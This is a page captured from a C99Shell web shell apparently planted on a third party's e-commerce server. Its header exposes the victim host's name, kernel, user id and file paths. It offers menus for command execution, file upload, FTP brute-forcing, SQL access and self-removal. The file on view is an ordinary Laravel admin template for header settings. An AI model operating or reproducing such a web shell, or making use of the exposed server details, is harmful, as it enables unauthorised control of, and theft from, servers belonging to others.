!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 27.21 GB of 117.98 GB (23.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     e54d05411c19d5d27a77a67049104839df96995b.php (14.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="tab-pane fade" id="v-pills-bottomHeader" role="tabpanel" aria-labelledby="v-pills-bottomHeader-tab">
    <div class="row">
        <div class="col-sm-12">
            <div class="row">
                <div class="col-sm-12">
                    <div class="form-group row">
                        <label for="footer-bottom-title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Header Text Color')); ?></label>
                        <div class="col-sm-5">
                            <input type="text" class="form-control demo inputFieldDesign" data-control="hue"
                                name="<?php echo e($layout); ?>_template_header[bottom][text_color]"
                                value="<?php echo e(isset($header['bottom']['text_color']) ? $header['bottom']['text_color'] : ''); ?>">
                        </div>
                    </div>
                    <div class="form-group row">
                        <label for="footer-bottom-title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Header Background Color')); ?></label>
                        <div class="col-sm-5">
                            <input type="text" class="form-control demo inputFieldDesign" data-control="hue"
                                name="<?php echo e($layout); ?>_template_header[bottom][bg_color]"
                                value="<?php echo e(isset($header['bottom']['bg_color']) ? $header['bottom']['bg_color'] : ''); ?>">
                        </div>
                    </div>
                </div>
            </div>
            <div class="form-group row">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Show Category')); ?></label>
                <div class="col-sm-5 -mt-6">
                    <input type="hidden" name="<?php echo e($layout); ?>_template_header[bottom][show_category]" value="0">
                    <div class="switch switch-bg d-inline m-r-10">
                        <input class="is_default" name="<?php echo e($layout); ?>_template_header[bottom][show_category]" <?php echo e($header['bottom']['show_category'] ? 'checked' ''); ?> value="<?php echo e($header['bottom']['show_category']); ?>" type="checkbox" id="show-category">
                        <label for="show-category" class="cr"></label>
                    </div>
                </div>
            </div>
            <div class="form-group row conditional preview-parent" data-if="#show-category">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Category Expand')); ?></label>
                <div class="col-sm-5 -mt-6">
                    <input type="hidden" name="<?php echo e($layout); ?>_template_header[bottom][category_expand]" value="0">
                    <div class="switch switch-bg d-inline m-r-10">
                        <input class="is_default" name="<?php echo e($layout); ?>_template_header[bottom][category_expand]" <?php echo e($header['bottom']['category_expand'] ? 'checked' ''); ?> value="<?php echo e($header['bottom']['category_expand']); ?>" type="checkbox" id="category-expand">
                        <label for="category-expand" class="cr"></label>
                    </div>
                </div>
            </div>
            <div class="row conditional" data-if="#show-category">
                <div class="col-sm-12">
                    <div class="form-group row">
                        <label for="footer-bottom-title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Category Text Color')); ?></label>
                        <div class="col-sm-5">
                            <input type="text" class="form-control demo inputFieldDesign" data-control="hue"
                                name="<?php echo e($layout); ?>_template_header[bottom_category][text_color]"
                                value="<?php echo e(isset($header['bottom_category']['text_color']) ? $header['bottom_category']['text_color'] : ''); ?>">
                        </div>
                    </div>
                    <div class="form-group row">
                        <label for="footer-bottom-title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Category Background Color')); ?></label>
                        <div class="col-sm-5">
                            <input type="text" class="form-control demo inputFieldDesign" data-control="hue"
                                name="<?php echo e($layout); ?>_template_header[bottom_category][bg_color]"
                                value="<?php echo e(isset($header['bottom_category']['bg_color']) ? $header['bottom_category']['bg_color'] : ''); ?>">
                        </div>
                    </div>
                </div>
            </div>

            <div class="row">
                <div class="col-sm-12">
                    <div class="form-group row">
                        <label for="footer-bottom-title" class="col-sm-4 text-left col-form-label"><?php echo e(__('Top Border Color')); ?></label>
                        <div class="col-sm-5">
                            <input type="text" class="form-control demo inputFieldDesign" data-control="hue"
                                name="<?php echo e($layout); ?>_template_header[bottom][border_top]"
                                value="<?php echo e(isset($header['bottom']['border_top']) ? $header['bottom']['border_top'] : '#000000'); ?>">
                        </div>
                    </div>
                    <div class="form-group row">
                        <label for="footer-bottom-title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Bottom Border Color')); ?></label>
                        <div class="col-sm-5">
                            <input type="text" class="form-control demo inputFieldDesign" data-control="hue"
                                name="<?php echo e($layout); ?>_template_header[bottom][border_bottom]"
                                value="<?php echo e(isset($header['bottom']['border_bottom']) ? $header['bottom']['border_bottom'] : '#000000'); ?>">
                        </div>
                    </div>
                </div>
            </div>

            <div class="form-group row">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Show Page Menu')); ?></label>
                <div class="col-sm-5 -mt-6">
                    <input type="hidden" name="<?php echo e($layout); ?>_template_header[bottom][show_page_menu]" value="0">
                    <div class="switch switch-bg d-inline m-r-10">
                        <input class="is_default" name="<?php echo e($layout); ?>_template_header[bottom][show_page_menu]" <?php echo e($header['bottom']['show_page_menu']  ? 'checked' ''); ?> value="<?php echo e($header['bottom']['show_page_menu']); ?>" type="checkbox" id="show-page-menu">
                        <label for="show-page-menu" class="cr"></label>
                    </div>
                </div>
            </div>

            <div class="form-group row">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Show Download App')); ?></label>
                <div class="col-sm-5 -mt-6">
                    <input type="hidden" name="<?php echo e($layout); ?>_template_header[bottom][show_download_app]" value="0">
                    <div class="switch switch-bg d-inline m-r-10">
                        <input class="is_default" name="<?php echo e($layout); ?>_template_header[bottom][show_download_app]" <?php echo e($header['bottom']['show_download_app'] ? 'checked' ''); ?> value="<?php echo e($header['bottom']['show_download_app']); ?>" type="checkbox" id="show-download-app">
                        <label for="show-download-app" class="cr"></label>
                    </div>
                </div>
            </div>

            <div class="form-group row conditional preview-parent" data-if="#show-download-app">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Show Google Play')); ?></label>
                <div class="col-sm-5 -mt-6">
                    <input type="hidden" name="<?php echo e($layout); ?>_template_header[bottom][show_google_play]" value="0">
                    <div class="switch switch-bg d-inline m-r-10">
                        <input class="is_default" name="<?php echo e($layout); ?>_template_header[bottom][show_google_play]" <?php echo e($header['bottom']['show_google_play'] ? 'checked' ''); ?> value="<?php echo e($header['bottom']['show_google_play']); ?>" type="checkbox" id="show-google-play">
                        <label for="show-google-play" class="cr"></label>
                    </div>
                </div>
            </div>
            <div class="form-group row mb-1 conditional preview-parent" data-if="#show-download-app && #show-google-play">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Upload Google Play Logo')); ?></label>
                <div class="col-sm-5">
                    <div class="custom-file media-manager-img" data-val="single" data-returntype="ids" id="image-status">
                        <input class="custom-file-input is-image form-control d-none" name="<?php echo e($layout); ?>_template_download_google_play_logo">

                        <label class="custom-file-label overflow_hidden position-relative d-flex align-items-center"
                            for="validatedCustomFile"><?php echo e(__('Upload Google Play image')); ?></label>
                    </div>
                    <div class="preview-image hide-close" id="company_favicon">
                        <!-- img will be shown here -->
                        <div class="d-flex flex-wrap mt-2">
                            <?php if($image['id']['download_google_play_logo']): ?>
                                <div class="position-relative border boder-1 p-1 mr-2 rounded mt-2 old-image">
                                    <div
                                        class="position-absolute rounded-circle text-center img-delete-icon"
                                        data-objectId="<?php echo e($image['id']['download_google_play_logo']); ?>">
                                        <i class="fa fa-times"></i>
                                    </div>

                                    <img class="upl-img object-contain neg-transition-scale" class="p-1"
                                        src="<?php echo e($image['download_google_play_logo']); ?>">
                                </div>
                            <?php endif; ?>
                        </div>
                    </div>
                </div>
            </div>
            <div class="form-group row conditional preview-parent" data-if="#show-download-app && #show-google-play">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Google Play Link')); ?></label>
                <div class="col-sm-5">
                    <input type="text" class="form-control inputFieldDesign" name="<?php echo e($layout); ?>_template_header[bottom][google_play_link]" placeholder="<?php echo e(__('Google Play Link')); ?>" value="<?php echo e($header['bottom']['google_play_link']); ?>">
                </div>
            </div>

            <div class="form-group row conditional preview-parent" data-if="#show-download-app">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Show App Store')); ?></label>
                <div class="col-sm-5 -mt-6">
                    <input type="hidden" name="<?php echo e($layout); ?>_template_header[bottom][show_app_store]" value="0">
                    <div class="switch switch-bg d-inline m-r-10">
                        <input class="is_default" name="<?php echo e($layout); ?>_template_header[bottom][show_app_store]" <?php echo e($header['bottom']['show_app_store'] ? 'checked' ''); ?> value="<?php echo e($header['bottom']['show_app_store']); ?>" type="checkbox" id="show-app-store">
                        <label for="show-app-store" class="cr"></label>
                    </div>
                </div>
            </div>

            <div class="form-group row mb-1 conditional preview-parent" data-if="#show-download-app  && #show-app-store">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('Upload App Store Logo')); ?></label>
                <div class="col-sm-5">
                    <div class="custom-file media-manager-img" data-val="single" data-returntype="ids" id="image-status">
                        <input class="custom-file-input is-image form-control d-none" name="<?php echo e($layout); ?>_template_download_app_store_logo">

                        <label class="custom-file-label overflow_hidden position-relative d-flex align-items-center"
                            for="validatedCustomFile"><?php echo e(__('Upload App Store Image')); ?></label>
                    </div>
                    <div class="preview-image hide-close" id="company_favicon">
                        <!-- img will be shown here -->
                        <div class="d-flex flex-wrap mt-2">
                            <?php if($image['id']['download_app_store_logo']): ?>
                                <div class="position-relative border boder-1 p-1 mr-2 rounded mt-2 old-image">
                                    <div
                                        class="position-absolute rounded-circle text-center img-delete-icon"
                                        data-objectId="<?php echo e($image['id']['download_app_store_logo']); ?>">
                                        <i class="fa fa-times"></i>
                                    </div>

                                    <img class="upl-img object-contain neg-transition-scale" class="p-1"
                                        src="<?php echo e($image['download_app_store_logo']); ?>">
                                </div>
                            <?php endif; ?>
                        </div>
                    </div>
                </div>
            </div>
            <div class="form-group row conditional preview-parent" data-if="#show-download-app && #show-app-store">
                <label for="meta_title" class="col-sm-4 text-left col-form-label "><?php echo e(__('App Store Link')); ?></label>
                <div class="col-sm-5">
                    <input type="text" class="form-control inputFieldDesign" name="<?php echo e($layout); ?>_template_header[bottom][app_store_link]" placeholder="<?php echo e(__('App Store Link')); ?>" value="<?php echo e($header['bottom']['app_store_link']); ?>">
                </div>
            </div>
        </div>
    </div>
</div>
<?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/Modules/CMS/Resources/views/partials/themes/header/bottom-header.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--